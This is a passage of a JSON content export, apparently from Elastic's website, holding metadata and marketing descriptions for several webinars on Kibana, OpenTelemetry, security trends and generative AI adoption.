sector","seo_description_l10n":"","seo_keywords_l10n":"","seo_image":null,"noindex":false},"tags":[],"tags_elastic_stack":[],"tags_event_type":[{"title":"Webinars","label_l10n":"Webinars","keyword":"webinar","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7449a6fa428f966d","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:42:00.222Z","updated_at":"2022-08-25T18:09:24.790Z","ACL":{},"_version":10,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-26T01:40:17.963Z","user":"bltf020187e3918e5de"}}],"tags_event_type_delivery":[],"tags_industry":[],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[{"_version":4,"locale":"en-us","uid":"blt800f3049a517c000","ACL":{},"created_at":"2021-04-13T17:51:50.053Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"north-america","label_l10n":"North America","tags":[],"title":"North America","updated_at":"2024-04-17T07:38:48.383Z","updated_by":"blt3e52848e0cb3c394","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:47:41.929Z","user":"blt3044324473ef223b70bc674c"}},{"_version":1,"locale":"en-us","uid":"blt0c39553861919e12","ACL":{},"created_at":"2020-11-13T00:08:13.750Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"emea","label_l10n":"EMEA","tags":[],"title":"EMEA","updated_at":"2020-11-13T00:08:13.750Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:45:29.115Z","user":"blt3044324473ef223b70bc674c"}},{"_version":8,"locale":"en-us","uid":"blt25a1df5963785e04","ACL":{},"created_at":"2022-09-07T08:10:02.602Z","created_by":"blt3e52848e0cb3c394","hidden_value":false,"keyword":"apac","label_l10n":"Asia/Pacific","tags":[],"title":"Asia/Pacific","updated_at":"2024-04-16T19:59:05.617Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:46:36.098Z","user":"blt3044324473ef223b70bc674c"}}],"tags_role":[],"tags_stage":[],"tags_technical_level":[],"tags_topic":[],"tags_use_case":[],"timezone":{"title_l10n":"","url":""},"title":"Observability in the open: OTel for public sector","token":"t5o7jVNUKc","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2025-02-11T22:44:43.817Z","updated_by":"blt3044324473ef223b70bc674c","url":"/virtual-events/opentelemetry-in-public-sector-using-elastic","video_type":["blt321a8ac0bef65269"],"vidyard":{"uuid":"","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-02-18T14:57:12.962Z","user":"blt417fc94cb7c64d7d","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt90c4e8d2beb71483","_version":9,"locale":"en-us","ACL":{},"created_at":"2024-09-30T16:09:51.811Z","created_by":"blt3044324473ef223b70bc674c","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":"Placement #6","description":"For users who are new to Kibana and the Elastic Stack, this webinar will walk you through how to get started on Elastic Cloud and use Kibana to explore, analyze, and visualize your data along with how to share your data story via dashboards and more."},"hour_time_format":false,"image":{"uid":"bltb4a05e8897468e9f","created_by":"blt34b8388e29217650827c7cc3","updated_by":"blt34b8388e29217650827c7cc3","created_at":"2019-06-13T16:37:18.849Z","updated_at":"2019-06-13T16:37:18.849Z","content_type":"image/jpeg","file_size":"146353","filename":"rtp-featured-video-kibana-basics-vega.jpg","title":"rtp-featured-video-kibana-basics-vega.jpg","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-03-19T10:37:07.704Z","user":"blt8288fbcbd8c9dce4"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltb4a05e8897468e9f/5d027bbecf47a0f63e200e04/rtp-featured-video-kibana-basics-vega.jpg"},"main_header":{"topic_heading_l10n":"","title_l10n":"Getting Started with Kibana","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"16474","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":["bltd8d585d4734a50f6"],"gdpr_load_id":"4909"},"message_for_attendee":"","note":{"paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 14px;\"\u003e\u003cstrong\u003eJoin the upcoming Getting started with Kibana\u0026nbsp;session in your timezone:\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003eAmericas: Tuesday, March 4, 2025, at 9 a.m. PST, 12 p.m. EST\u003c/li\u003e\u003cli\u003eEurope \u0026amp; India: Tuesday, March 4, 2025, at 11 a.m. CET, 3:30 p.m. IST\u003c/li\u003e\u003cli\u003eAsia Pacific: Tuesday, March 4, 2025, at 11 a.m. SGT, 2 p.m. AEDT\u003c/li\u003e\u003c/ul\u003e"},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":null},"paragraph_l10n":"\u003cp\u003eKibana is a window into the Elastic Stack and the user interface for the Elasticsearch Platform. It allows you to visualize and explore data as well as manage and monitor the entire Elastic Stack. This webinar is perfect for users that are new to Kibana and are looking for a primer on how to get started with exploring data, creating visualizations, and setting up a dashboard. Watch a demo of going from a Kibana installation to a full dashboard in a matter of minutes.\u003c/p\u003e\u003cp\u003e\u003cstrong\u003eHighlights include:\u003c/strong\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cspan style=\"font-size: 11pt;\"\u003e\u003cstrong\u003eIntroduction to the ELK Stack and Kibana:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 11pt;\"\u003e Understand the components and synergy of Elasticsearch, Logstash, and Kibana.\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 11pt;\"\u003e\u003cstrong\u003eExploring data with Discover:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 11pt;\"\u003e Learn the differences between QueryDSL and ES|QL and how to effectively ingest and explore data.\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 11pt;\"\u003e\u003cstrong\u003eCreating interactive dashboards:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 11pt;\"\u003e Watch a live demo on building dashboards with various visualizations, filters, and drilldowns.\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 11pt;\"\u003e\u003cstrong\u003eReal-world use cases:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 11pt;\"\u003e See practical examples and solutions using sample data sets and logs.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cstrong\u003eDo not miss:\u003c/strong\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cstrong\u003eElastic's Kibana Workshop on March 11, 2025. \u003c/strong\u003e\u003cspan style='color:rgb(38, 38, 38);font-size: 11pt;'\u003eFor more information and to register,\u003c/span\u003e\u003cspan style='color:rgb(38, 38, 38);font-size: 11pt;'\u003e\u003cstrong\u003e \u003c/strong\u003e\u003c/span\u003e\u003ca href=\"https://events.elastic.co/kibanaworkshopmarch1\"\u003e\u003cspan style='font-size: 11pt;'\u003e\u003cstrong\u003ehead here.\u003c/strong\u003e\u003c/span\u003e\u003c/a\u003e \u003cp\u003e\u003cstrong\u003e\u003c/strong\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cstrong\u003eAdditional Resources:\u003c/strong\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/guide/en/kibana/current/introduction.html\"\u003e\u003cspan style=\"font-size: 11pt;\"\u003eKibana documentation\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/esql.html\"\u003e\u003cspan style=\"font-size: 11pt;\"\u003eES|QL documentation\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://discuss.elastic.co/c/elastic-stack/kibana/7\"\u003e\u003cspan style=\"font-size: 11pt;\"\u003eKibana discussion forum\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 11pt;\"\u003eYou can try hosted Kibana (and Elasticsearch) with a \u003c/span\u003e\u003ca href=\"https://cloud.elastic.co/registration\"\u003e\u003cspan style=\"font-size: 11pt;\"\u003eno-cost Elastic Cloud 14-day trial\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003c/ul\u003e","presentation_date":"2025-03-04T16:00:00.000Z","presenter":["blt0cb3a2f063da9ebb","blt66fc5c9958656092"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"Getting Started with Kibana","seo_description_l10n":"Kibana is a window into the Elastic Stack and the user interface for the Elastic Search Platform. It allows you to visualize and explore data as well as manage and monitor the entire Elastic Stack. This webinar is perfect for users that are new to Kibana and are looking for a primer on how to get started with exploring data, creating visualizations, and setting up a dashboard. Watch a demo of going from a Kibana installation to a full dashboard in a matter of minutes.","seo_keywords_l10n":"Kibana, data visualization, getting started with kibana, elasticsearch, ELK, ELK Stack, Elastic Stack, Elasticsearch","seo_image":{"uid":"blt33a750401541533b","created_by":"blt5280857d9e24912bc99a2478","updated_by":"blt5280857d9e24912bc99a2478","created_at":"2020-07-23T02:26:24.613Z","updated_at":"2020-07-23T02:26:24.613Z","content_type":"image/jpeg","file_size":"138658","filename":"kibana_screenshot_-_facebook_ad.jpg","title":"kibana_screenshot_-_facebook_ad.jpg","ACL":{},"_version":1,"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-07-23T02:27:52.483Z","user":"blt5280857d9e24912bc99a2478"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt33a750401541533b/5f18f550528fa676db4245fc/kibana_screenshot_-_facebook_ad.jpg"},"noindex":false},"speaker_deck":"","tags":["kibana","getting","started","visualizations","visualize","get","elastic stack"],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt3d820a0eae1c9158","ACL":{},"created_at":"2020-06-17T03:35:53.368Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2020-06-17T03:35:53.368Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.290Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt8b37b4b3ec0fe838","ACL":{},"created_at":"2020-06-17T03:36:06.107Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"kibana","label_l10n":"Kibana","tags":[],"title":"Kibana","updated_at":"2020-06-17T03:36:06.107Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.315Z","user":"blt4b2e1169881270a8"}}],"tags_event_type":[{"title":"Webinars","label_l10n":"Webinars","keyword":"webinar","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7449a6fa428f966d","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:42:00.222Z","updated_at":"2022-08-25T18:09:24.790Z","ACL":{},"_version":10,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-26T01:40:17.963Z","user":"bltf020187e3918e5de"}}],"tags_event_type_delivery":[],"tags_industry":[],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[{"_version":4,"locale":"en-us","uid":"blt800f3049a517c000","ACL":{},"created_at":"2021-04-13T17:51:50.053Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"north-america","label_l10n":"North America","tags":[],"title":"North America","updated_at":"2024-04-17T07:38:48.383Z","updated_by":"blt3e52848e0cb3c394","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:47:41.929Z","user":"blt3044324473ef223b70bc674c"}},{"_version":1,"locale":"en-us","uid":"bltf4c15a435ded5722","ACL":{},"created_at":"2021-04-13T17:54:31.202Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"europe","label_l10n":"Europe","tags":[],"title":"Europe","updated_at":"2021-04-13T17:54:31.202Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-10T12:13:00.412Z","user":"blt3e52848e0cb3c394"}},{"_version":8,"locale":"en-us","uid":"blt25a1df5963785e04","ACL":{},"created_at":"2022-09-07T08:10:02.602Z","created_by":"blt3e52848e0cb3c394","hidden_value":false,"keyword":"apac","label_l10n":"Asia/Pacific","tags":[],"title":"Asia/Pacific","updated_at":"2024-04-16T19:59:05.617Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:46:36.098Z","user":"blt3044324473ef223b70bc674c"}},{"_version":1,"locale":"en-us","uid":"bltdabf9ea82c489dad","ACL":{},"created_at":"2023-06-27T17:09:23.025Z","created_by":"blt36e890d06c5ec32c","hidden_value":false,"keyword":"india","label_l10n":"India","tags":[],"title":"India","updated_at":"2023-06-27T17:09:23.025Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-06-27T17:09:25.693Z","user":"blt36e890d06c5ec32c"}}],"tags_role":[],"tags_stage":[],"tags_technical_level":[{"title":"Intermediate","label_l10n":"Intermediate","keyword":"intermediate","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt09c5429e20d2ba41","created_by":"blt3e52848e0cb3c394","updated_by":"bltcb593abdd43b4039","created_at":"2021-08-24T12:52:59.050Z","updated_at":"2021-09-01T13:06:12.802Z","ACL":{},"_version":3,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-09-03T12:16:01.953Z","user":"blta4706a7723d386a4"}}],"tags_topic":[{"title":"Getting started","label_l10n":"Getting started","keyword":"getting-started","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt30953f4176054d3f","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:37:25.148Z","updated_at":"2020-06-17T03:37:25.148Z","ACL":{},"_version":1,"_workflow":{"uid":"blte3b720fd9661d254","updated_at":"2020-06-17T03:37:25.148Z","updated_by":"blt3044324473ef223b70bc674c","version":1},"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-01-07T18:03:25.028Z","user":"blt36e890d06c5ec32c"}},{"title":"Visualizing","label_l10n":"Visualizing","keyword":"visualizing","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt365f9ed2d77755c7","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:38:12.101Z","updated_at":"2020-06-17T03:38:12.101Z","ACL":{},"_version":1,"_workflow":{"uid":"blte3b720fd9661d254","updated_at":"2020-06-17T03:38:12.100Z","updated_by":"blt3044324473ef223b70bc674c","version":1},"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-07-06T00:48:22.629Z","user":"blt3044324473ef223b70bc674c"}}],"tags_use_case":[],"timezone":{"title_l10n":"","url":""},"title":"Getting Started with Kibana - Live","token":"5w0mbyyxpz","translated_date_l10n":"","translated_time_l10n":"11:00am CET","updated_at":"2025-02-09T20:17:52.281Z","updated_by":"blt7ee4b4a4026b9c0b","url":"/virtual-events/getting-started-kibana-live","video_type":["blt321a8ac0bef65269"],"vidyard":{"uuid":"","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-02-09T20:18:02.280Z","user":"blt7ee4b4a4026b9c0b","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt30b2ee437a1b1fce","_version":10,"locale":"en-us","ACL":{},"created_at":"2024-12-23T19:13:47.952Z","created_by":"blt3044324473ef223b70bc674c","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":"Security trends for 2025: Predicting threat evolution and defending by design","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"12485","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":["bltd8d585d4734a50f6"],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"Featuring","page_layout":{"page_layout":"default"},"paragraph_l10n":"\u003cp\u003eRapidly developing cybersecurity events are driving security operation centers and technology vendors alike to redefine their strategies in order to adapt to the dynamic landscape. These advancements are shaking up security teams' traditional workflows and establishing an evolved methodology for tackling a new era of advanced threats.\u003c/p\u003e\u003cp\u003eJake King, Elastic Security Lead, is joined by guest speaker Allie Mellen, Forrester Principal Analyst, in a dialogue around the most pressing cybersecurity trends and events. See how tools and practices — both established and brand new — are being developed and refined in response to the shifting threat landscape. With unique insights from the recent Elastic Global Threat Report and predictions from Forrester, this event will explore:\u003c/p\u003e\u003cul\u003e\u003cli\u003eThe changes that security teams should expect from vendors and the SIEM market\u003c/li\u003e\u003cli\u003eThe role that generative AI will play for both defenders and adversaries\u003c/li\u003e\u003cli\u003eThe rising trend of credential access techniques and how defenders can detect and respond\u003c/li\u003e\u003cli\u003eCloud defaults and methods to improve security posture\u003c/li\u003e\u003cli\u003eThe importance of detection engineering and encouraging rapid response with practices like detections-as-code\u003c/li\u003e\u003c/ul\u003e\u003ch4\u003eAdditional resources\u003c/h4\u003e\u003cul\u003e\u003cli\u003e\u003ca href=\"/resources/security/report/global-threat-report\" target=\"_self\"\u003e2024 Elastic Global Threat Report\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/security-labs\" target=\"_self\"\u003eElastic Security Labs\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"/security\" target=\"_self\"\u003eElastic Security\u003cbr /\u003e\u003c/a\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cem\u003eThis webinar was pre-recorded on January 22, 2025 and originally aired on February 6, 2025*\u003c/em\u003e\u003c/p\u003e","presentation_date":"2025-02-06T17:00:00.000Z","presenter":["blt9518b6e226b48800","blta1ccbdea9067d35d"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"Security trends for 2025","seo_description_l10n":"Join our webinar for an insightful discussion on the rapidly evolving cybersecurity landscape, where experts will delve into the latest tools and practices shaping the way security teams tackle advanced threats. Gain unique insights from the recent Elastic Global Threat Report and Forrester's predictions on the most pressing cybersecurity trends.","seo_keywords_l10n":"","seo_image":null,"noindex":false},"tags":[],"tags_elastic_stack":[],"tags_event_type":[{"title":"Webinars","label_l10n":"Webinars","keyword":"webinar","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7449a6fa428f966d","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:42:00.222Z","updated_at":"2022-08-25T18:09:24.790Z","ACL":{},"_version":10,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-26T01:40:17.963Z","user":"bltf020187e3918e5de"}}],"tags_event_type_delivery":[],"tags_industry":[],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[{"_version":4,"locale":"en-us","uid":"blt800f3049a517c000","ACL":{},"created_at":"2021-04-13T17:51:50.053Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"north-america","label_l10n":"North America","tags":[],"title":"North America","updated_at":"2024-04-17T07:38:48.383Z","updated_by":"blt3e52848e0cb3c394","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:47:41.929Z","user":"blt3044324473ef223b70bc674c"}},{"_version":1,"locale":"en-us","uid":"blt0c39553861919e12","ACL":{},"created_at":"2020-11-13T00:08:13.750Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"emea","label_l10n":"EMEA","tags":[],"title":"EMEA","updated_at":"2020-11-13T00:08:13.750Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:45:29.115Z","user":"blt3044324473ef223b70bc674c"}},{"_version":8,"locale":"en-us","uid":"blt25a1df5963785e04","ACL":{},"created_at":"2022-09-07T08:10:02.602Z","created_by":"blt3e52848e0cb3c394","hidden_value":false,"keyword":"apac","label_l10n":"Asia/Pacific","tags":[],"title":"Asia/Pacific","updated_at":"2024-04-16T19:59:05.617Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:46:36.098Z","user":"blt3044324473ef223b70bc674c"}}],"tags_role":[],"tags_stage":[],"tags_technical_level":[],"tags_topic":[],"tags_use_case":[],"timezone":{"title_l10n":"","url":""},"title":"Security trends for 2025: Predicting threat evolution and defending by design","token":"3270556792","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2025-02-07T15:40:58.693Z","updated_by":"blt417fc94cb7c64d7d","url":"/virtual-events/2025-cybersecurity-trends","video_type":["bltdcadaef5bdccac7e"],"vidyard":{"uuid":"gkoK6EHPCYaZnMKE7jvQdj","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-02-07T18:36:43.568Z","user":"blt417fc94cb7c64d7d","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blte29e67cc94b8bcc4","_version":3,"locale":"en-us","ACL":{},"created_at":"2025-02-05T22:41:49.980Z","created_by":"blt3044324473ef223b70bc674c","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":"Unleashing the power of GenAI","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"12485","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":["bltd8d585d4734a50f6"],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":"default"},"paragraph_l10n":"\u003cp\u003eDiscover use cases and insights on how GenAI and Elasticsearch can create new value propositions across various industries. Learn how Elastic can help your customers unlock the transformative potential of generative AI.\u003c/p\u003e\u003ch4\u003eHighlights\u003c/h4\u003e\u003cul\u003e\u003cli\u003eLearn about the foundational concepts of generative AI and understand how Elastic's robust search capabilities can support and enhance GenAI applications.\u003c/li\u003e\u003cli\u003eDive into a range of compelling use cases, detailing how different sectors can benefit from the integration of GenAI and Elasticsearch.\u003c/li\u003e\u003cli\u003eMeet our GenAI Campaigns team and learn how to use GenAI marketing materials with your customers to drive results.\u003c/li\u003e\u003c/ul\u003e","presentation_date":"2024-06-05T16:00:00.000Z","presenter":["bltc21bb0620de1421e"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"Unleashing the power of GenAI","seo_description_l10n":"Discover use cases and insights on how GenAI and Elasticsearch can create new value propositions across various industries. Learn how Elastic can help your customers unlock the transformative potential of generative AI.\n","seo_keywords_l10n":"","seo_image":null,"noindex":false},"tags":[],"tags_elastic_stack":[],"tags_event_type":[{"title":"Webinars","label_l10n":"Webinars","keyword":"webinar","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7449a6fa428f966d","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:42:00.222Z","updated_at":"2022-08-25T18:09:24.790Z","ACL":{},"_version":10,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-26T01:40:17.963Z","user":"bltf020187e3918e5de"}}],"tags_event_type_delivery":[],"tags_industry":[],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[{"_version":4,"locale":"en-us","uid":"blt800f3049a517c000","ACL":{},"created_at":"2021-04-13T17:51:50.053Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"north-america","label_l10n":"North America","tags":[],"title":"North America","updated_at":"2024-04-17T07:38:48.383Z","updated_by":"blt3e52848e0cb3c394","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:47:41.929Z","user":"blt3044324473ef223b70bc674c"}}],"tags_role":[],"tags_stage":[],"tags_technical_level":[],"tags_topic":[],"tags_use_case":[],"timezone":{"title_l10n":"","url":""},"title":"Unleashing the power of GenAI","token":"","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2025-02-06T19:47:04.385Z","updated_by":"blt3044324473ef223b70bc674c","url":"/virtual-events/unleashing-power-of-genai","video_type":["bltdcadaef5bdccac7e"],"vidyard":{"uuid":"swtsMbffdke9NxMQdaV3nh","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-02-06T19:47:08.910Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltd81ebf5db7febf15","_version":4,"locale":"en-us","ACL":{},"created_at":"2025-02-03T21:17:59.640Z","created_by":"blt3044324473ef223b70bc674c","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":"Future-proof your business: How to lead, not lag on your journey to AI adoption","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"12485","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":["bltd8d585d4734a50f6"],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":"default"},"paragraph_l10n":"\u003cp\u003eThe question is no longer whether generative AI is here to stay, but whether your organization is ready to embark on its AI adoption journey (or expand its use cases and get ROI). Join our panel of IT leaders from Adobe, Comcast, and Elastic for a webinar exploring how to identify genuine opportunities amid the hype, take on common challenges, and future-proof your organization on its AI adoption journey.\u003c/p\u003e\u003ch4\u003eHighlights\u003c/h4\u003e\u003cul\u003e\u003cli\u003eDifferent approaches to solving business problems with generative AI\u003c/li\u003e\u003cli\u003ePractical approaches to incorporating AI into current workflows while maintaining seamless operations\u003c/li\u003e\u003cli\u003eHow the panelists measured results to show business value\u003c/li\u003e\u003cli\u003eThe challenges they’re facing and what we’re doing to overcome them\u003c/li\u003e\u003c/ul\u003e\u003ch4\u003eAdditional resources\u003c/h4\u003e\u003cul\u003e\u003cli\u003e\u003ca href=\"/blog/maximize-roi-generative-ai-strategy\"\u003e3 ways to maximize the ROI on your generative AI strategy\u003c/a\u003e (Blog)\u003c/li\u003e\u003cli\u003e\u003ca href=\"/blog/how-to-turn-data-into-actionable-insights\"\u003eHow to turn data into actionable insights\u003c/a\u003e (Blog)\u003c/li\u003e\u003cli\u003e\u003ca href=\"/portfolio/operationalizing-generative-ai-strategic-guide\"\u003eHow to operationalize generative AI\u003c/a\u003e (Ebook)\u003c/li\u003e\u003cli\u003e\u003ca href=\"/generative-ai\"\u003eElastic GenAI tools and capabilities\u003c/a\u003e (Web 